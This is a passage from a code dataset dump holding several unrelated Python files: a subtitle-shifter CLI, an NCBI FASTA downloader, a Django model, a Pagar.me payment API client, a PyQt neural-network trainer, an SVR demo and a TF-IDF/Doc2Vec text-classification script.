Efficiency in IT/Data Centers\"\nmatches.returnMatches(worksheet, searchEntry)\n\n\n\n","sub_path":".ipynb_checkpoints/search-checkpoint.py","file_name":"search-checkpoint.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"304406025","text":"import argparse\nimport logging\nimport os\nimport sys\nimport time\n\n# Use absolute imports to support pyinstaller\n# https://github.com/pyinstaller/pyinstaller/issues/2560\nfrom sushi import run, VERSION\nfrom sushi.common import SushiError\n\nif sys.platform == 'win32':\n try:\n import colorama\n colorama.init()\n console_colors_supported = True\n except ImportError:\n console_colors_supported = False\nelse:\n console_colors_supported = True\n\n\nclass ColoredLogFormatter(logging.Formatter):\n bold_code = \"\\033[1m\"\n reset_code = \"\\033[0m\"\n grey_code = \"\\033[30m\\033[1m\"\n\n error_format = \"{bold}ERROR: %(message)s{reset}\".format(bold=bold_code, reset=reset_code)\n warn_format = \"{bold}WARNING: %(message)s{reset}\".format(bold=bold_code, reset=reset_code)\n debug_format = \"{grey}%(message)s{reset}\".format(grey=grey_code, reset=reset_code)\n default_format = \"%(message)s\"\n\n def format(self, record):\n if record.levelno == logging.DEBUG:\n self._fmt = self.debug_format\n elif record.levelno == logging.WARN:\n self._fmt = self.warn_format\n elif record.levelno == logging.ERROR or record.levelno == logging.CRITICAL:\n self._fmt = self.error_format\n else:\n self._fmt = self.default_format\n\n return super(ColoredLogFormatter, self).format(record)\n\n\ndef create_arg_parser():\n parser = argparse.ArgumentParser(description='Sushi - Automatic Subtitle Shifter')\n\n parser.add_argument('--window', default=10, type=int, metavar='', dest='window',\n help='Search window size. [%(default)s]')\n parser.add_argument('--max-window', default=30, type=int, metavar='', dest='max_window',\n help=\"Maximum search size Sushi is allowed to use when trying to recover from errors. [%(default)s]\")\n parser.add_argument('--rewind-thresh', default=5, type=int, metavar='', dest='rewind_thresh',\n help=\"Number of consecutive errors Sushi has to encounter to consider results broken \"\n \"and retry with larger window. Set to 0 to disable. [%(default)s]\")\n parser.add_argument('--no-grouping', action='store_false', dest='grouping',\n help=\"Don't events into groups before shifting. Also disables error recovery.\")\n parser.add_argument('--max-kf-distance', default=2, type=float, metavar='', dest='max_kf_distance',\n help='Maximum keyframe snapping distance. [%(default)s]')\n parser.add_argument('--kf-mode', default='all', choices=['shift', 'snap', 'all'], dest='kf_mode',\n help='Keyframes-based shift correction/snapping mode. [%(default)s]')\n parser.add_argument('--smooth-radius', default=3, type=int, metavar='', dest='smooth_radius',\n help='Radius of smoothing median filter. [%(default)s]')\n\n # 10 frames at 23.976\n parser.add_argument('--max-ts-duration', default=1001.0 / 24000.0 * 10, type=float, metavar='',\n dest='max_ts_duration',\n help='Maximum duration of a line to be considered typesetting. [%(default).3f]')\n # 10 frames at 23.976\n parser.add_argument('--max-ts-distance', default=1001.0 / 24000.0 * 10, type=float, metavar='',\n dest='max_ts_distance',\n help='Maximum distance between two adjacent typesetting lines to be merged. [%(default).3f]')\n\n # deprecated/test options, do not use\n parser.add_argument('--test-shift-plot', default=None, dest='plot_path', help=argparse.SUPPRESS)\n parser.add_argument('--sample-type', default='uint8', choices=['float32', 'uint8'], dest='sample_type',\n help=argparse.SUPPRESS)\n\n parser.add_argument('--sample-rate', default=12000, type=int, metavar='', dest='sample_rate',\n help='Downsampled audio sample rate. [%(default)s]')\n\n parser.add_argument('--src-audio', default=None, type=int, metavar='', dest='src_audio_idx',\n help='Audio stream index of the source video')\n parser.add_argument('--src-script', default=None, type=int, metavar='', dest='src_script_idx',\n help='Script stream index of the source video')\n parser.add_argument('--dst-audio', default=None, type=int, metavar='', dest='dst_audio_idx',\n help='Audio stream index of the destination video')\n # files\n parser.add_argument('--no-cleanup', action='store_false', dest='cleanup',\n help=\"Don't delete demuxed streams\")\n parser.add_argument('--temp-dir', default=None, dest='temp_dir', metavar='',\n help='Specify temporary folder to use when demuxing stream.')\n parser.add_argument('--chapters', default=None, dest='chapters_file', metavar='',\n help=\"XML or OGM chapters to use instead of any found in the source. 'none' to disable.\")\n parser.add_argument('--script', default=None, dest='script_file', metavar='',\n help='Subtitle file path to use instead of any found in the source')\n\n parser.add_argument('--dst-keyframes', default=None, dest='dst_keyframes', metavar='',\n help='Destination keyframes file')\n parser.add_argument('--src-keyframes', default=None, dest='src_keyframes', metavar='',\n help='Source keyframes file')\n parser.add_argument('--dst-fps', default=None, type=float, dest='dst_fps', metavar='',\n help='Fps of the destination video. Must be provided if keyframes are used.')\n parser.add_argument('--src-fps', default=None, type=float, dest='src_fps', metavar='',\n help='Fps of the source video. Must be provided if keyframes are used.')\n parser.add_argument('--dst-timecodes', default=None, dest='dst_timecodes', metavar='',\n help='Timecodes file to use instead of making one from the destination (when possible)')\n parser.add_argument('--src-timecodes', default=None, dest='src_timecodes', metavar='',\n help='Timecodes file to use instead of making one from the source (when possible)')\n\n parser.add_argument('--src', required=True, dest=\"source\", metavar='',\n help='Source audio/video')\n parser.add_argument('--dst', required=True, dest=\"destination\", metavar='',\n help='Destination audio/video')\n parser.add_argument('-o', '--output', default=None, dest='output_script', metavar='',\n help='Output script')\n\n parser.add_argument('-v', '--verbose', default=False, dest='verbose', action='store_true',\n help='Enable verbose logging')\n parser.add_argument('--version', action='version', version=VERSION)\n\n return parser\n\n\ndef parse_args_and_run(cmd_keys):\n def format_arg(arg):\n return arg if ' ' not in arg else '\"{0}\"'.format(arg)\n\n args = create_arg_parser().parse_args(cmd_keys)\n handler = logging.StreamHandler()\n if console_colors_supported and os.isatty(sys.stderr.fileno()):\n # enable colors\n handler.setFormatter(ColoredLogFormatter())\n else:\n handler.setFormatter(logging.Formatter(fmt=ColoredLogFormatter.default_format))\n logging.root.addHandler(handler)\n logging.root.setLevel(logging.DEBUG if args.verbose else logging.INFO)\n\n logging.info(\"Sushi's running with arguments: {0}\".format(' '.join(map(format_arg, cmd_keys))))\n start_time = time.time()\n run(args)\n logging.info('Done in {0}s'.format(time.time() - start_time))\n\n\ndef main():\n try:\n parse_args_and_run(sys.argv[1:])\n except SushiError as e:\n logging.critical(e.message)\n sys.exit(2)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sushi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":8023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331539186","text":"# -*- coding = utf-8 -*-\n# @Time :2021-02-08 15:49\n# @Author : Broth Yang\n# @File :NCBI.py\n# @Software :PyCharm\n\nimport requests\n\n\ndef Write_Fasta(Key, data):\n fileName = Key + '.fasta'\n with open('./fasta/'+fileName, 'w', encoding='utf-8') as fp:\n fp.write(data)\n\n\ndef Get_Data():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63'\n }\n Key_word = str(input('请输入要搜索的关键词:'))\n url = 'https://www.ncbi.nlm.nih.gov/sviewer/viewer.fcgi?' + 'id=' + Key_word + '&db=nuccore&report=fasta&extrafeat=null&conwithfeat=on&hide-cdd=on&retmode=html&withmarkup=on&tool=portal&log$=seqview&maxdownloadsize=1000000'\n res = requests.get(url=url, headers=headers, timeout=4)\n page_text = res.text\n Write_Fasta(Key_word, page_text)\n print('文件下载成功')\n\n\nif __name__ == '__main__':\n Get_Data()\n\n","sub_path":"ncbi.py","file_name":"ncbi.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"55187836","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Projet(models.Model):\n\tname = models.CharField(max_length=255)\n\tdescription = models.TextField()\n\tdeadline = models.DateField()\n\towner = models.ForeignKey(User, on_delete=models.CASCADE)\n\tremarques = models.TextField(null=True, blank=True)\n\t# photo = models.ImageField(null=True)\n\tslug = models.SlugField(unique=True)\n","sub_path":"src/projet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328238245","text":"import inquirer\nimport aiohttp\nimport logging\nimport json\nimport os\n\n_logger = logging.getLogger(\"Pagar.me API\")\nPAGARME_API = \"https://api.pagar.me/1\"\n\nAUTHENTICATION_METHOD = os.environ[\"AUTHENTICATION_METHOD\"]\nif AUTHENTICATION_METHOD == \"api_key\":\n API_KEY = os.environ[\"API_KEY\"]\nelif AUTHENTICATION_METHOD == \"user\":\n SESSION_ID = None\n ENVIRONMENT = os.environ[\"ENVIRONMENT\"]\n if ENVIRONMENT not in [\"test\", \"live\"]:\n raise ValueError(f\"Invalid ENVIRONMENT {ENVIRONMENT}\")\nelse:\n raise ValueError(f\"Invalid AUTHENTICATION_METHOD {AUTHENTICATION_METHOD}\")\n\n\nasync def _request(method, endpoint, params=None, body=None):\n url = PAGARME_API + endpoint\n\n # Set the authentication variables\n headers = dict()\n request_params = dict()\n if AUTHENTICATION_METHOD == \"api_key\":\n request_params[\"api_key\"] = API_KEY\n elif AUTHENTICATION_METHOD == \"user\":\n if SESSION_ID is not None:\n request_params[\"session_id\"] = SESSION_ID\n headers[\"X-Live\"] = \"1\" if ENVIRONMENT == \"live\" else \"0\"\n\n if params is not None:\n request_params.update(params)\n\n try:\n request = aiohttp.request(\n method, url, headers=headers, params=request_params, json=body)\n async with request as response:\n # If status is different from 200, something went wrong\n if response.status != 200:\n _logger.error(await response.text())\n return None\n data = await response.json()\n _logger.info(f\"{url} {params} {body}\")\n _logger.info(json.dumps(data))\n return data\n except aiohttp.ServerTimeoutError:\n _logger.error(f\"ServerTimeoutError - {url} {json.dumps(body)}\")\n except aiohttp.ClientConnectorError:\n _logger.error(f\"ClientConnectorError - {url} {json.dumps(body)}\")\n\n\nasync def post(endpoint, body=None):\n return await _request(\"POST\", endpoint, body=body)\n\n\nasync def get(endpoint, params=None):\n return await _request(\"GET\", endpoint, params=params)\n\n\ndef _save_session_id():\n with open(\".session_id\", \"w\") as session_file:\n session_file.write(SESSION_ID)\n\n\ndef _load_session_id():\n try:\n with open(\".session_id\", \"r\") as session_file:\n return session_file.read()\n except FileNotFoundError:\n return None\n\n\nasync def _get_user_info():\n endpoint = \"/user\"\n return await get(endpoint)\n\n\nasync def authenticate():\n global SESSION_ID\n\n if AUTHENTICATION_METHOD != \"user\":\n return True\n\n session_id = _load_session_id()\n if session_id is not None:\n SESSION_ID = session_id\n result = await _get_user_info()\n if result is not None:\n return True\n\n endpoint = \"/sessions\"\n\n questions = [\n inquirer.Text(\"email\", message=\"Email\"),\n inquirer.Password(\"password\", message=\"Password\")\n ]\n body = inquirer.prompt(questions)\n result = await post(endpoint, body=body)\n if result is not None:\n SESSION_ID = result[\"session_id\"]\n _save_session_id()\n return True\n return False\n","sub_path":"src/pagarme_api.py","file_name":"pagarme_api.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205068854","text":"import pandas as pd\r\nimport numpy as np\r\nfrom PyQt5 import QtWidgets,QtCore\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QVBoxLayout\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.pyplot import pause\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neural_network import MLPRegressor\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import decomposition\r\n\r\n#Ui_MainWindow, QBaseApplication = uic.loadUiType('./form_canva.ui')\r\n\r\nUi_app, QBase = uic.loadUiType('./vistas/form_canva.ui')\r\n\r\nclass MainWindow(QMainWindow, Ui_app):\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n Ui_app.__init__(self)\r\n self.setupUi(self)\r\n\r\n # Widguet\r\n self.canvas = FigureCanvasQTAgg(Figure())\r\n vLayout = QVBoxLayout()\r\n vLayout.setContentsMargins(0, 0, 0, 0)\r\n vLayout.addWidget(self.canvas)\r\n self.widget_canva.setLayout(vLayout)\r\n\r\n self.llenar_combo()\r\n self.btngraficar.clicked.connect(self.graphTraining)\r\n\r\n def llenar_combo(self):\r\n\r\n iteraciones = []\r\n \r\n for a in range(100,1000,100):\r\n iteraciones.append(str(a))\r\n\r\n self.cbxiteraciones.addItems(iteraciones)\r\n\r\n \r\n def getAxes(self, nRows, nColumns, position):\r\n return self.canvas.figure.add_subplot(nRows, nColumns, position)\r\n\r\n def toGraph(self):\r\n self.canvas.figure.tight_layout()\r\n self.canvas.draw()\r\n self.canvas.flush_events()\r\n pause(.0001)\r\n\r\n def graphTraining(self):\r\n axes = self.getAxes(1, 2, 1)\r\n axesFunc = self.getAxes(1, 2, 2)\r\n\r\n df = pd.read_csv('./csv/bateria.csv')\r\n x = df['Tiempo']\r\n y = df['Carga']\r\n\r\n X = x[:, np.newaxis] # Realizas un array de los datos dependientes para tener una mejor estructura de ellos.\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y)\r\n\r\n\r\n # Llenado de las tablas entrenamiento\r\n\r\n fila = 0\r\n row = 0\r\n \r\n self.tableWidgetentrenamiento.setColumnCount(2)\r\n self.tableWidgetentrenamiento.setHorizontalHeaderLabels(['Tiempo/Minuto', 'Carga'])\r\n self.tableWidgetentrenamiento.setGeometry(QtCore.QRect(110, 200, 274, 250))\r\n\r\n for dato in X_train:\r\n fila = fila + 1\r\n \r\n self.tableWidgetentrenamiento.setRowCount(fila)\r\n\r\n for dato in X_train:\r\n\r\n x1 = QtWidgets.QTableWidgetItem(str(dato[0]))\r\n\r\n self.tableWidgetentrenamiento.setItem(row, 0, x1)\r\n\r\n row = row + 1\r\n\r\n row=0\r\n\r\n for dato in y_train:\r\n\r\n x2 = QtWidgets.QTableWidgetItem(str(dato))\r\n\r\n self.tableWidgetentrenamiento.setItem(row, 1, x2)\r\n\r\n row = row + 1\r\n\r\n self.tableWidgetentrenamiento.verticalHeader().setVisible(False)\r\n\r\n # Llenado de las tablas pruebas\r\n\r\n fila = 0\r\n row = 0\r\n \r\n self.tableWidgetprueba.setColumnCount(2)\r\n self.tableWidgetprueba.setHorizontalHeaderLabels(['Tiempo/Minuto', 'Carga'])\r\n self.tableWidgetprueba.setGeometry(QtCore.QRect(540, 200, 274, 250))\r\n\r\n for dato in X_train:\r\n fila = fila + 1\r\n \r\n self.tableWidgetprueba.setRowCount(fila)\r\n\r\n for dato in X_test:\r\n\r\n x1 = QtWidgets.QTableWidgetItem(str(dato[0]))\r\n\r\n self.tableWidgetprueba.setItem(row, 0, x1)\r\n\r\n row = row + 1\r\n\r\n row=0\r\n\r\n for dato in y_test:\r\n\r\n x2 = QtWidgets.QTableWidgetItem(str(dato))\r\n\r\n self.tableWidgetprueba.setItem(row, 1, x2)\r\n\r\n row = row + 1\r\n\r\n self.tableWidgetprueba.verticalHeader().setVisible(False)\r\n\r\n row=0\r\n\r\n #lr = 0.001\r\n #alpha = 0.0001\r\n #nn = [9, 1]\r\n max_iter = int(self.cbxiteraciones.currentText())\r\n\r\n # hidden_layer_sizes = cantidad de neurona que poseera el algoritmo en la capa oculta\r\n\r\n mlp = MLPRegressor(solver='sgd', alpha=1e-4, hidden_layer_sizes=(60), max_iter=int(self.cbxiteraciones.currentText()), tol=1e-4, random_state=1)\r\n\r\n i = 1\r\n\r\n while i <= max_iter:\r\n mlp.partial_fit(X_train, y_train)\r\n score1 = r2_score(y_test, mlp.predict(X_test))\r\n score2 = mlp.score(X_train, y_train)\r\n\r\n axesFunc.clear()\r\n axesFunc.set_title('Trining')\r\n axesFunc.plot('Tiempo', 'Carga', data=df,\r\n c='blue', label='Real Data - Value')\r\n axesFunc.plot(df['Tiempo'], mlp._predict(\r\n X), 'r--', c='red', label='Neural Network Model')\r\n axesFunc.grid(True)\r\n axesFunc.tick_params(labelleft=False)\r\n axesFunc.legend(loc='upper right')\r\n\r\n axes.clear()\r\n axes.set_title('Loss')\r\n axes.plot(range(len(mlp.loss_curve_)), mlp.loss_curve_,\r\n label='Epoch {}/{} - Score {:.2f}'.format(i, max_iter, score2))\r\n axes.grid(True)\r\n axes.legend(loc='upper right')\r\n axes.tick_params(labelleft=False)\r\n self.toGraph()\r\n if score1 > .95 and score2 > .95:\r\n break\r\n i += 1","sub_path":"panaderia-ia/controladores/neurona.py","file_name":"neurona.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183768862","text":"from sklearn import svm\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nsvm回归\n\nclf = svm.SVR()\nclf.fit(x, y)\nclf.predict(test)\n\"\"\"\n\n\ndef test():\n \"\"\"\n 总的来说径向基核函数的回归效果最好,线性核只适合直线的回归\n :return:\n \"\"\"\n x = np.sort(5 * np.random.rand(40, 1), axis=0) # 随机生成40*1的二维数组\n y = np.sin(x).ravel() # 用six求数据的解,并将解铺平成一维数组,对应着x中每一行的值\n y[::5] += 3 * (0.5 - np.random.rand(8)) # 更改原来完全拟合好的数据,相当于加入噪音\n\n svr_rbf = svm.SVR(kernel='rbf', C=1e3, gamma=0.1)\n svr_lin = svm.SVR(kernel='linear', C=1e3)\n svr_poly = svm.SVR(kernel='poly', C=1e3, degree=2)\n\n y_rbf = svr_rbf.fit(x, y).predict(x)\n y_lin = svr_lin.fit(x, y).predict(x)\n y_poly = svr_poly.fit(x, y).predict(x)\n\n lw = 2\n plt.scatter(x, y, color='darkorange', label='data')\n plt.plot(x, y_rbf, color='navy', lw=lw, label='RBF model')\n plt.plot(x, y_lin, color='c', lw=lw, label='Linear model')\n plt.plot(x, y_poly, color='cornflowerblue', lw=lw, label='Polynomial model')\n plt.xlabel('data')\n plt.ylabel('target')\n plt.title('Support Vector Regression')\n plt.legend()\n plt.show()\n\n\ntest()","sub_path":"SVM/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160716280","text":"# Text Classification Example with Selected Newsgroups from Twenty Newsgroups\n\n# Author: Thomas W. Miller (2019-03-08)\n# Modified by: John Kiley (2019-05-04)\n\n# Compares text classification performance under random forests\n# Six vectorization methods compared:\n# TfidfVectorizer from Scikit Learn\n# CountVectorizer from Scikit Learn\n# HashingVectorizer from Scikit Learn\n# Doc2Vec from gensim (dimension 50)\n# Doc2Vec from gensim (dimension 100)\n# Doc2Vec from gensim (dimension 200)\n\n# See example data and code from \n# https://scikit-learn.org/0.19/datasets/twenty_newsgroups.html\n\n# The 20 newsgroups dataset comprises around 18000 newsgroups \n# posts on 20 topics split in two subsets: one for training (or development) \n# and the other one for testing (or for performance evaluation). \n# The split between the train and test set is based upon messages \n# posted before and after a specific date.\n\n# =============================================================================\n# Establish working environment\n# =============================================================================\n\nimport multiprocessing\nimport re,string\nimport os\nfrom pprint import pprint\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer,\\\n CountVectorizer, HashingVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.cross_decomposition import CCA # canonical correlation\nfrom sklearn.model_selection import train_test_split\n\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\n\n\nimport nltk\nfrom nltk.stem import PorterStemmer\n\n# =============================================================================\n# Set global variables\n# =============================================================================\n\nstoplist = nltk.corpus.stopwords.words('english')\nDROP_STOPWORDS = False\nSET_RANDOM = 9999\nSTEMMING = False # judgment call, parsed documents more readable if False\nMAX_NGRAM_LENGTH = 2 # try 1 and 2 and see which yields better modeling results\nVECTOR_LENGTH_LIST = [8, 16, 32, 64, 128, 256, 512] # set vector length for TF-IDF and Doc2Vec\nWRITE_VECTORS_TO_FILE = False\n\n# JSON lines file for storing canonical correlatin results across many runs\ncancor_results_file = open('cancor-results-file.jsonl', 'a+') # open new file or append to existing\n\n#%%\n# =============================================================================\n# Utility Functions \n# =============================================================================\n\n# define list of codes to be dropped from document\n# carriage-returns, line-feeds, tabs\ncodelist = ['\\r', '\\n', '\\t'] \n\n# text parsing function for entire document string\ndef parse_doc(text):\n text = text.lower()\n text = re.sub(r'&(.)+', \"\", text) # no & references \n text = re.sub(r'pct', 'percent', text) # replace pct abreviation \n text = re.sub(r\"[^\\w\\d'\\s]+\", '', text) # no punct except single quote \n text = re.sub(r'[^\\x00-\\x7f]',r'', text) # no non-ASCII strings \n if text.isdigit(): text = \"\" # omit words that are all digits \n for code in codelist:\n text = re.sub(code, ' ', text) # get rid of escape codes \n # replace multiple spacess with one space\n text = re.sub('\\s+', ' ', text) \n return text\n\n# text parsing for words within entire document string\n# splits the document string into words/tokens\n# parses the words and then recreates a document string\n# returns list of parsed words/tokens and parsed document string\ndef parse_words(text): \n # split document into individual words\n tokens=text.split()\n re_punc = re.compile('[%s]' % re.escape(string.punctuation))\n # remove punctuation from each word\n tokens = [re_punc.sub('', w) for w in tokens]\n # remove remaining tokens that are not alphabetic\n tokens = [word for word in tokens if word.isalpha()]\n # filter out tokens that are one or two characters long\n tokens = [word for word in tokens if len(word) > 2]\n # filter out tokens that are more than twenty characters long\n tokens = [word for word in tokens if len(word) < 21]\n # filter out stop words if requested\n if DROP_STOPWORDS:\n tokens = [w for w in tokens if not w in stoplist] \n # perform word stemming if requested\n if STEMMING:\n ps = PorterStemmer()\n tokens = [ps.stem(word) for word in tokens]\n # recreate the document string from parsed words\n text = ''\n for token in tokens:\n text = text + ' ' + token\n return tokens, text \n\n#%% \n# =============================================================================\n# Import data from JSON lines file\n# =============================================================================\n\n# identify directory JSON lines files \ndocdir = r'C:\\Users\\johnk\\Desktop\\Grad School\\6. Spring 2019\\1. MSDS_453_NLP\\6. Homework\\week5\\economics\\econ\\files'\n\nprint('\\nList of file names in the data directory:\\n')\nprint(os.listdir(docdir))\n\nall_data = []\n\nfor file in os.listdir(docdir): \n if file.endswith('.jsonl'):\n file_name = file.split('.')[0] # keep name without extension\n with open(os.path.join(docdir,file), 'rb') as f:\n for line in f:\n all_data.append(json.loads(line))\n\n#%%\n# =============================================================================\n# Unpack the list of dictionaries to create data frame\n# =============================================================================\n\nurl = []\ntitle = []\ntags = []\ntext = []\nlabels = []\nfinal_processed_tokens = [] # list of token lists for Doc2Vec\nfinal_processed_text = [] # list of document strings for TF-IDF\nlabels = [] # use filenames as labels\nfor doc in all_data:\n url.append(doc['url'])\n title.append(doc['title'])\n tags.append(doc['tags'])\n labels.append(doc['labels'])\n text_string = doc['text']\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n text.append(text_string)\n final_processed_tokens.append(tokens)\n final_processed_text.append(text_string)\n\ndf = pd.DataFrame({\"url\": url,\n \"title\": title,\n \"tags\": tags,\n \"text\": text,\n \"labels\": labels},)\n\n#the following is an example of what the processed text looks like. \nprint('\\nBeginning and end of the data frame:\\n')\nprint(df.head(2))\nprint(df.tail(2))\n\n#%%\n# =============================================================================\n# Split the corpus into training & testing sets\n# =============================================================================\n\ntrain_data, test_data = train_test_split(all_data, random_state=1)\n\n#%%\n# =============================================================================\n# Preprocess the training set; set asside labels\n# =============================================================================\ntrain_titles = []\ntrain_tokens = [] # list of token lists for gensim Doc2Vec\ntrain_text = [] # list of document strings for sklearn TF-IDF\ntrain_target = [] # use filenames as labels\nfor doc in train_data:\n train_titles.append(doc['title'])\n text_string = doc['text']\n train_target.append(doc['labels'])\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n train_tokens.append(tokens)\n train_text.append(text_string)\n \n \nprint('\\nNumber of training documents:',\n\tlen(train_text))\t\n#print('\\nFirst item after text preprocessing, train_text[0]\\n', \n#\ttrain_text[0])\nprint('\\nNumber of training token lists:',\n\tlen(train_tokens))\t\n#print('\\nFirst list of tokens after text preprocessing, train_tokens[0]\\n', \n#\ttrain_tokens[0])\n#%%\n# =============================================================================\n# Spot check; confirm labels & titles match up\n# =============================================================================\n\npprint(train_titles[:10])\npprint(train_target[:10])\n\n#%%\n# =============================================================================\n# Preprocess the testing set; set asside labels\n# =============================================================================\ntest_tokens = [] # list of token lists for gensim Doc2Vec\ntest_text = [] # list of document strings for sklearn TF-IDF\ntest_target= [] # use filenames as labels\ntest_titles = []\n\nfor doc in test_data:\n test_titles.append(doc['title'])\n text_string = doc['text']\n test_target.append(doc['labels'])\n # parse the entire document string\n text_string = parse_doc(text_string)\n # parse words one at a time in document string\n tokens, text_string = parse_words(text_string)\n test_tokens.append(tokens)\n test_text.append(text_string)\n\n\nprint('\\nNumber of testing documents:',\n\tlen(test_text))\t\n#print('\\nFirst item after text preprocessing, test_text[0]\\n', \n#\ttest_text[0])\nprint('\\nNumber of testing token lists:',\n\tlen(test_tokens))\t\n#print('\\nFirst list of tokens after text preprocessing, test_tokens[0]\\n', \n#\ttest_tokens[0])\n#%%\n# =============================================================================\n# Spot check; confirm labels & titles match up\n# =============================================================================\n\npprint(test_titles[:10])\npprint(test_target[:10])\n\n#%%\n\n# =============================================================================\n# Perform TFIDF & Word2Vec canonical correlation analysis\n# =============================================================================\n \n# create list for saving canonical correlation results\ncancor_results = [] \n\nfor VECTOR_LENGTH in VECTOR_LENGTH_LIST: \n print('\\n---------- VECTOR LENGTH ', str(VECTOR_LENGTH), ' ----------\\n')\n # =============================================================================\n # TF-IDF\n # =============================================================================\n # note the ngram_range will allow you to include multiple-word tokens \n # within the TFIDF matrix\n # Call Tfidf Vectorizer\n print('\\nWorking on TF-IDF vectorization')\n Tfidf = TfidfVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n \tmax_features = VECTOR_LENGTH)\n\n # fit the vectorizer using final processed documents. \n TFIDF_matrix = Tfidf.fit_transform(final_processed_text) \n\n tfidf_solution = pd.DataFrame(TFIDF_matrix.toarray()) # for modeling work \n\n #creating datafram from TFIDF Matrix\n matrix = pd.DataFrame(TFIDF_matrix.toarray(), \n \tcolumns = Tfidf.get_feature_names(), \n \tindex = labels)\n\n if WRITE_VECTORS_TO_FILE:\n tfidf_file_name = 'tfidf-matrix-'+ str(VECTOR_LENGTH) + '.csv'\n matrix.to_csv(tfidf_file_name)\n print('\\nTF-IDF vectorization complete, matrix saved to ', tfidf_file_name, '\\n')\n\n # =============================================================================\n # gensim Doc2Vec\n # =============================================================================\n \n print(\"\\nWorking on Doc2Vec vectorization\")\n documents = [TaggedDocument(doc, [i]) for i, doc in enumerate(final_processed_tokens)]\n model = Doc2Vec(documents, vector_size = VECTOR_LENGTH, window = 2, \n \tmin_count = 1, workers = 4)\n\n doc2vec_df = pd.DataFrame()\n for i in range(0,len(final_processed_tokens)):\n vector = pd.DataFrame(model.infer_vector(final_processed_tokens[i])).transpose()\n doc2vec_df = pd.concat([doc2vec_df,vector], axis=0)\n\n doc2vec_solution = doc2vec_df # for modeling work\n\n doc2vec_df = doc2vec_df.reset_index()\n\n doc_titles = {'title': labels}\n t = pd.DataFrame(doc_titles)\n\n doc2vec_df = pd.concat([doc2vec_df,t], axis=1)\n\n doc2vec_df = doc2vec_df.drop('index', axis=1)\n doc2vec_df = doc2vec_df.set_index('title')\n\n if WRITE_VECTORS_TO_FILE:\n doc2vec_file_name = 'doc2vec-matrix-'+ str(VECTOR_LENGTH) + '.csv'\n doc2vec_df.to_csv(doc2vec_file_name)\n print('\\nDoc2Vec vectorization complete, matrix saved to ', doc2vec_file_name, '\\n')\n\n # =============================================================================\n # Canonical Correlation... show relationship between TF-IDF and Doc2Vec\n # =============================================================================\n\n n_components = 3\n cca = CCA(n_components)\n cca.fit(X = tfidf_solution, Y = doc2vec_solution)\n\n U, V = cca.transform(X = tfidf_solution, Y = doc2vec_solution)\n\n for i in range(n_components):\n corr = np.corrcoef(U[:,i], V[:,i])[0,1]\n\n print('\\nCanonical correlation betwen TF-IDF and Doc2Vec for vectors of length ', \n str(VECTOR_LENGTH), ':', np.round(corr, 3), '\\n')\n\n cancor_results.append(np.round(corr, 3))\n\n data = json.dumps({\"STEMMING\":STEMMING,\n \"MAX_NGRAM_LENGTH\":MAX_NGRAM_LENGTH,\n \"VECTOR_LENGTH\":VECTOR_LENGTH,\n \"CANCOR\":np.round(corr, 3)}) \n cancor_results_file.write(data)\n cancor_results_file.write('\\n')\n\nprint('\\nSummary of Canonoical Correlation between TF-IDF and Doc2Vec Vectorizations\\n')\nprint('\\nVector Length Correlation')\nprint('\\n-------------------------')\nfor item in range(len(VECTOR_LENGTH_LIST)):\n print(' ', VECTOR_LENGTH_LIST[item], ' ', cancor_results[item])\n\ncancor_results_file.close()\n\n#%%\n# =============================================================================\n# TF-IDF Vectorization\n# =============================================================================\n\ntfidf_vectorizer = TfidfVectorizer(ngram_range = (1, MAX_NGRAM_LENGTH), \n max_features = VECTOR_LENGTH)\ntfidf_vectors = tfidf_vectorizer.fit_transform(train_text)\nprint('\\nTFIDF vectorization. . .')\nprint('\\nTraining tfidf_vectors_training.shape:', tfidf_vectors.shape)\n\n# Apply the same vectorizer to the test data\n# Notice how we use tfidf_vectorizer.transform, NOT tfidf_vectorizer.fit_transform\ntfidf_vectors_test = tfidf_vectorizer.transform(test_text)\nprint('\\nTest tfidf_vectors_test.shape:', tfidf_vectors_test.shape)\ntfidf_clf = RandomForestClassifier(n_estimators = 100, max_depth = 10, \n\trandom_state = SET_RANDOM)\ntfidf_clf.fit(tfidf_vectors, train_target)\ntfidf_pred = 